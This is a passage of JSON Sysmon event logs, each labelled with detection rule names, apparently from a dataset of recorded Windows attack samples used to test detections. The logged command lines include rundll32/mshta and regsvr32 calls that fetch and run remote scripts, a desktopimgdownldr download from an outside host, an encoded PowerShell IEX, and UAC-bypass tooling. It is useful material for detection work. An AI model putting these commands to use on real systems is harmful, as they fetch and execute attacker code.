https://hotelesms.com/talsk.txt\",0,true);","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-39CC-5CE3-0000-002096C70000","LogonId":"0xc796","ParentCommandLine":"\"cmd.exe\" /s /k pushd \"C:\\Users\\IEUser\\Desktop\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-4F8A-5CE3-0000-0010C5BB4800","ParentProcessId":3548,"ProcessGuid":"365ABB72-1A29-5CE4-0000-001054E32101","ProcessId":1532,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-21 15:32:57.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4125,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T15:32:57.286254Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows host process 
(Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-39CC-5CE3-0000-002096C70000","LogonId":"0xc796","ParentCommandLine":"cmd.exe /C rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-1A29-5CE4-0000-001054E32101","ParentProcessId":1532,"ProcessGuid":"365ABB72-1A29-5CE4-0000-00107BE42101","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-21 15:32:57.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4126,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T15:32:57.286254Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-12 
13:30:46.181","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-1FF8-5CD8-0000-00102A342000","ProcessId":1332,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\ieframe.url","UtcTime":"2019-05-12 13:30:46.181"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16387,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":1996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:30:46.181756Z"}},"Version":2}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" ieframe.dll,OpenURL c:\\users\\ieuser\\appdata\\local\\temp\\ieframe.url","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"python winpwnage.py -u execute -i 9 -p c:\\Windows\\system32\\cmd.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-1FF8-5CD8-0000-00102A342000","ParentProcessId":1332,"ProcessGuid":"365ABB72-2006-5CD8-0000-0010A2862300","ProcessId":2960,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:30:46.213"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16388,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":1996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:30:46.400506Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-208A-5CD8-0000-0010119B2400","ProcessId":3560,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:32:58.167"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16390,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":1996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:32:58.167195Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-20B1-5CD8-0000-001064D62400","ProcessId":1844,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:33:37.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16391,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":1996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:33:37.078801Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-20C7-5CD8-0000-001021022500","ProcessId":1416,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:33:59.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16392,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":1996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:33:59.743077Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-21B8-5CD8-0000-0010BADE2600","ProcessId":3856,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:38:00.523"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16395,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":1996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:38:00.523670Z"}},"Version":5}}}},{"detection":["Code Execution via Pcwutl.dll","Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" pcwutl.dll,LaunchApplication c:\\Windows\\system32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-516B-5CD8-0000-001087E41600","ParentProcessId":3788,"ProcessGuid":"365ABB72-532E-5CD8-0000-00106C222700","ProcessId":1528,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
17:09:02.275"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16507,"Execution":{"#attributes":{"ProcessID":2012,"ThreadID":300}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T17:09:02.275164Z"}},"Version":5}}}},{"detection":["FromBase64String Command Line","Encoded FromBase64String","Suspicious Script Execution From Temp Folder","Encoded IEX"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))\"\"\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-F639-5D53-0000-001092EE2600","ParentProcessId":6000,"ProcessGuid":"747F3D96-F639-5D53-0000-0010B0FC2600","ProcessId":8180,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 
11:53:29.768"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10662,"Execution":{"#attributes":{"ProcessID":2004,"ThreadID":4480}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-14T11:53:30.022856Z"}},"Version":5}}}},{"detection":["Suspicious Desktopimgdownldr Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1CE4-5EFE-0000-0020CC9C0800","LogonId":"0x89ccc","OriginalFileName":"Cmd.Exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-EF3D-5EFE-0000-0010F3653401","ParentProcessId":5384,"ProcessGuid":"747F3D96-F098-5EFE-0000-001012E13801","ProcessId":1932,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-03 
08:47:20.001"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":305352,"Execution":{"#attributes":{"ProcessID":3324,"ThreadID":4016}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T08:47:20.037922Z"}},"Version":5}}}},{"detection":["Suspicious Desktopimgdownldr Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"desktopimgdownldr.exe","FileVersion":"10.0.17763.1075 (WinBuild.160101.0800)","Hashes":"SHA1=BCDDCFFCA3754875261EF1427EC4F5F4BFB8C2CE,MD5=A6DAD18B0AA125535C7FB9BBFDA25266,SHA256=0A6A2690C68CF685D8FCC9F3EA78C35BBF6F296B7B33C956B39400DF749DBC78,IMPHASH=F8D617766CF1026390A712DFC1AE2EDA","Image":"C:\\Windows\\System32\\desktopimgdownldr.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1CE4-5EFE-0000-0020CC9C0800","LogonId":"0x89ccc","OriginalFileName":"desktopimgdownldr.exe","ParentCommandLine":"cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-F098-5EFE-0000-001012E13801","ParentProcessId":1932,"ProcessGuid":"747F3D96-F098-5EFE-0000-001090E33801","ProcessId":4604,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-03 
08:47:20.055"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":305354,"Execution":{"#attributes":{"ProcessID":3324,"ThreadID":4016}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T08:47:20.073262Z"}},"Version":5}}}},{"detection":["Suspicious Desktopimgdownldr Target File","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-07-03 08:47:21.485","Image":"C:\\Windows\\System32\\svchost.exe","ProcessGuid":"747F3D96-2178-5EFE-0000-0010AADA5800","ProcessId":1556,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Personalization\\LockScreenImage\\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z","UtcTime":"2020-07-03 08:47:21.485"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":305356,"Execution":{"#attributes":{"ProcessID":3324,"ThreadID":4016}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T08:47:21.491108Z"}},"Version":2}}}},{"detection":["Always Install Elevated MSI Spawned Cmd And 
Powershell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-C494-5CC8-0000-0020E4FF0000","LogonId":"0xffe4","ParentCommandLine":"\"C:\\Windows\\Installer\\MSI4FFD.tmp\"","ParentImage":"C:\\Windows\\Installer\\MSI4FFD.tmp","ParentProcessGuid":"365ABB72-D0E4-5CC8-0000-00103CB73E00","ParentProcessId":3680,"ProcessGuid":"365ABB72-D0E5-5CC8-0000-0010DADF3E00","ProcessId":2892,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 22:49:09.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":10153,"Execution":{"#attributes":{"ProcessID":1936,"ThreadID":1644}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T22:49:10.198351Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-C494-5CC8-0000-0020E4FF0000","LogonId":"0xffe4","ParentCommandLine":"cmd","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D0E5-5CC8-0000-0010DADF3E00","ParentProcessId":2892,"ProcessGuid":"365ABB72-D1AB-5CC8-0000-0010DB1E4400","ProcessId":1372,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 22:52:27.588"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":10154,"Execution":{"#attributes":{"ProcessID":1936,"ThreadID":1644}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T22:52:27.588976Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-433D-5CE0-0000-002031350100","LogonId":"0x13531","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-433C-5CE0-0000-00100FD20000","ParentProcessId":964,"ProcessGuid":"365ABB72-4612-5CE0-0000-00103D1E2600","ProcessId":2600,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-18 